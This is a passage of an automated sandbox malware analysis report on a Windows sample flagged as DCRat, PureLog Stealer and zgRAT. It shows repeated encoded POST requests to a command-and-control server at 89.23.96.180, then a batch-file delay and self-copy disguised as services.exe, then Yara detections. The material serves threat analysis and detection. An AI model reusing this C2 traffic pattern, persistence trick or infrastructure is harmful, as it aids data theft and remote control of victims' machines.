                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              66192.168.2.54999689.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:48:57.085597992 CET398OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Dec 21, 2024 10:48:57.440265894 CET2536OUTData Raw: 58 52 43 50 5d 59 57 57 55 5e 55 5a 54 5e 50 56 57 5a 5c 5f 52 51 51 5d 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XRCP]YWWU^UZT^PVWZ\_RQQ]_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY E9!2=.*9.,/'/+-#!%&W<$+=?*!_.#Q,2
                                                              Dec 21, 2024 10:48:58.462394953 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:58.694391966 CET200INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:58 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              67192.168.2.55000289.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:48:58.939971924 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:59.283992052 CET2536OUTData Raw: 58 54 46 52 5d 5a 52 52 55 5e 55 5a 54 5c 50 55 57 5d 5c 55 52 5e 51 59 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XTFR]ZRRU^UZT\PUW]\UR^QY_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY B-/$=>=Z.''?'-4:%2>('<?<*%!_.#Q,
                                                              Dec 21, 2024 10:49:00.365125895 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:49:00.554080963 CET200INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:49:00 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              68192.168.2.55000489.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:49:00.805372000 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:49:01.159497976 CET2536OUTData Raw: 58 50 43 5e 5d 57 52 55 55 5e 55 5a 54 52 50 50 57 5c 5c 5f 52 50 51 5a 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XPC^]WRUU^UZTRPPW\\_RPQZ_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY :W$&>*!.Y<'/987/)&1"V+4<>-?)!_.#Q,


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              69192.168.2.55000989.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:49:01.815587044 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2112
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:49:02.174602985 CET2112OUTData Raw: 58 5e 43 54 5d 5b 57 54 55 5e 55 5a 54 5d 50 5d 57 5f 5c 58 52 57 51 5e 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: X^CT][WTU^UZT]P]W_\XRWQ^_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY C93&>%?1%],/33<',(. =16P<'$<.(_)%!_.#Q,>
                                                              Dec 21, 2024 10:49:03.186129093 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:49:03.422312021 CET349INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:49:03 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 39 38 0d 0a 0e 1e 3a 0c 20 3b 25 11 3c 2a 33 12 29 3c 2d 0c 29 58 3d 06 2f 0c 34 06 22 2c 3e 13 3e 03 0d 10 30 3e 2c 04 21 14 32 04 36 3c 33 13 2a 31 2e 58 01 1e 22 18 23 55 29 1f 33 3f 0d 55 3d 37 2a 5b 3c 2d 3a 58 27 3f 05 53 32 5c 34 58 3c 14 05 09 27 3d 3e 5d 38 06 2f 10 2b 3e 20 1d 24 26 2b 51 03 1e 26 58 26 2c 2f 55 26 0d 1b 12 31 3e 3d 58 20 3e 28 0f 3e 38 02 09 34 3b 03 07 2f 5f 23 07 28 03 25 02 2a 06 0c 59 24 3f 3c 0a 25 3e 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 98: ;%<*3)<-)X=/4",>>0>,!26<3*1.X"#U)3?U=7*[<-:X'?S2\4X<'=>]8/+> $&+Q&X&,/U&1>=X >(>84;/_#(%*Y$?<%>#T-,H1]V0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              70192.168.2.55001089.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:49:02.214210987 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:49:02.565342903 CET2536OUTData Raw: 58 51 43 56 5d 58 52 53 55 5e 55 5a 54 5d 50 52 57 5b 5c 58 52 5e 51 57 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XQCV]XRSU^UZT]PRW[\XR^QW_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY D:'26*!*.Y%/#,8!#9'25?$?(8X=!_.#Q,>
                                                              Dec 21, 2024 10:49:03.595254898 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:49:03.826407909 CET200INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:49:03 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              71192.168.2.55001689.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:49:04.074954987 CET398OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Dec 21, 2024 10:49:04.424951077 CET2536OUTData Raw: 58 53 46 53 5d 5d 52 54 55 5e 55 5a 54 59 50 5d 57 52 5c 5d 52 5e 51 56 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XSFS]]RTU^UZTYP]WR\]R^QV_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY -0W%>=U?16-'$,.=Q4-\22U*4#>-Y*%!_.#Q,.
                                                              Dec 21, 2024 10:49:05.452729940 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:49:05.686933994 CET200INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:49:05 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              72192.168.2.55002289.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:49:05.932707071 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:49:06.284308910 CET2536OUTData Raw: 58 56 43 54 5d 59 57 51 55 5e 55 5a 54 5e 50 56 57 59 5c 54 52 56 51 5e 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XVCT]YWQU^UZT^PVWY\TRVQ^_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY .!$T26*2:,?83</.8!W","&5+43+=/=5!_.#Q,2
                                                              Dec 21, 2024 10:49:07.313076973 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:49:07.546442032 CET200INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:49:07 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              73192.168.2.55002889.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:49:07.817017078 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2532
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:49:08.174614906 CET2532OUTData Raw: 5d 52 43 50 5d 58 57 52 55 5e 55 5a 54 5b 50 54 57 5a 5c 59 52 5e 51 5c 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: ]RCP]XWRU^UZT[PTWZ\YR^Q\_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY#9#%>5?1>. 3(U:&7/Z2"?$8</=!_.#Q,"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              74192.168.2.55002989.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:49:08.546477079 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2084
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:49:08.893526077 CET2084OUTData Raw: 5d 56 46 57 5d 5a 52 55 55 5e 55 5a 54 5e 50 57 57 5a 5c 55 52 56 51 5f 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: ]VFW]ZRUU^UZT^PWWZ\URVQ__]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY -! S1==Q)169?3 T:;)#-\%2W<+Z?>?)!_.#Q,2
                                                              Dec 21, 2024 10:49:09.930911064 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:49:10.166493893 CET349INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:49:09 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 39 38 0d 0a 0e 1e 39 1c 37 05 2d 1e 2b 2a 05 12 3e 06 26 54 2b 3e 0b 07 2f 22 33 5e 21 3c 3a 12 2a 3e 24 00 30 07 30 01 35 04 29 59 22 3c 34 06 29 21 2e 58 01 1e 21 06 21 23 2a 0b 30 3f 0e 0d 2a 27 26 5e 28 58 21 01 24 2c 33 52 32 04 24 14 28 03 24 54 25 04 39 04 2c 2c 33 12 2b 3d 28 50 30 0c 2b 51 03 1e 26 12 25 02 23 1e 32 0a 3a 07 25 00 29 5f 23 2d 30 0c 3d 28 3c 09 23 2b 22 5f 38 2a 38 58 29 3e 3a 10 2a 01 2d 00 24 2c 2f 16 32 3e 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 9897-+*>&T+>/"3^!<:*>$005)Y"<4)!.X!!#*0?*'&^(X!$,3R2$($T%9,,3+=(P0+Q&%#2:%)_#-0=(<#+"_8*8X)>:*-$,/2>#T-,H1]V0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              75192.168.2.55003089.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:49:08.727204084 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:49:09.081408024 CET2536OUTData Raw: 58 5e 43 5e 58 5d 52 54 55 5e 55 5a 54 52 50 54 57 5c 5c 59 52 50 51 59 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: X^C^X]RTU^UZTRPTW\\YRPQY_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY E-11-"*).Y$\'?3-8>7,*2"5?4([;*5!_.#Q,
                                                              Dec 21, 2024 10:49:10.104902983 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:49:10.338294029 CET200INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:49:10 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Statistics

                                                              CPU Usage

                                                              Click to jump to process

                                                              Memory Usage

                                                              Click to jump to process

                                                              High Level Behavior Distribution

                                                              Click to dive into process behavior distribution

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              General

                                                              Target ID:0
                                                              Start time:04:47:04
                                                              Start date:21/12/2024
                                                              Path:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Users\user\Desktop\XNPOazHpXF.exe"
                                                              Imagebase:0xfb0000
                                                              File size:10'393'088 bytes
                                                              MD5 hash:ADAE028E0A5A72D219A02BB06D92241A
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.2052319303.0000000000FB2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.2117348326.0000000013BDF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:low
                                                              Has exited:true

                                                              General

                                                              Target ID:2
                                                              Start time:04:47:10
                                                              Start date:21/12/2024
                                                              Path:C:\Windows\System32\cmd.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1kuSaYZZpb.bat"
                                                              Imagebase:0x7ff650e30000
                                                              File size:289'792 bytes
                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:3
                                                              Start time:04:47:10
                                                              Start date:21/12/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6d64d0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:4
                                                              Start time:04:47:10
                                                              Start date:21/12/2024
                                                              Path:C:\Windows\System32\chcp.com
                                                              Wow64 process (32bit):false
                                                              Commandline:chcp 65001
                                                              Imagebase:0x7ff71f490000
                                                              File size:14'848 bytes
                                                              MD5 hash:33395C4732A49065EA72590B14B64F32
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:5
                                                              Start time:04:47:10
                                                              Start date:21/12/2024
                                                              Path:C:\Windows\System32\PING.EXE
                                                              Wow64 process (32bit):false
                                                              Commandline:ping -n 10 localhost
                                                              Imagebase:0x7ff7ffec0000
                                                              File size:22'528 bytes
                                                              MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:7
                                                              Start time:04:47:19
                                                              Start date:21/12/2024
                                                              Path:C:\Windows\InputMethod\CHT\services.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\InputMethod\CHT\services.exe"
                                                              Imagebase:0xa60000
                                                              File size:10'393'088 bytes
                                                              MD5 hash:ADAE028E0A5A72D219A02BB06D92241A
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000007.00000002.3303823064.0000000003794000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000007.00000002.3303823064.00000000032FB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000007.00000002.3303823064.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\InputMethod\CHT\services.exe, Author: Joe Security
                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\InputMethod\CHT\services.exe, Author: Joe Security
                                                              Antivirus matches:
                                                              • Detection: 74%, ReversingLabs
                                                              Reputation:low
                                                              Has exited:false

                                                              Disassembly

                                                              Reset < >

                                                                Execution Graph

                                                                Execution Coverage:5%
                                                                Dynamic/Decrypted Code Coverage:75%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:12
                                                                Total number of Limit Nodes:0
                                                                execution_graph 22286 7ff8490d0915 22287 7ff8490d092f GetFileAttributesW 22286->22287 22289 7ff8490d09f5 22287->22289 22298 7ff8490cea60 22299 7ff8490cea6a ResumeThread 22298->22299 22301 7ff8490ceb74 22299->22301 22290 7ff8490cd1fd 22291 7ff8490cd20b SuspendThread 22290->22291 22293 7ff8490cd2e4 22291->22293 22294 7ff8490cebc9 22295 7ff8490cebd7 CloseHandle 22294->22295 22297 7ff8490cecb4 22295->22297

                                                                Executed Functions

                                                                Function 00007FF848F20D68 Relevance: .3, Instructions: 271COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2139918697.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff848f20000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e8295980656dc7011769144b89e13592a524fce32a49370ccb7cc3e734748fcf
                                                                • Instruction ID: 91764d7d9d8e4a659b5fb2c3efa77f99ba1fddb0320e31e2c273a3664d12d232
                                                                • Opcode Fuzzy Hash: e8295980656dc7011769144b89e13592a524fce32a49370ccb7cc3e734748fcf
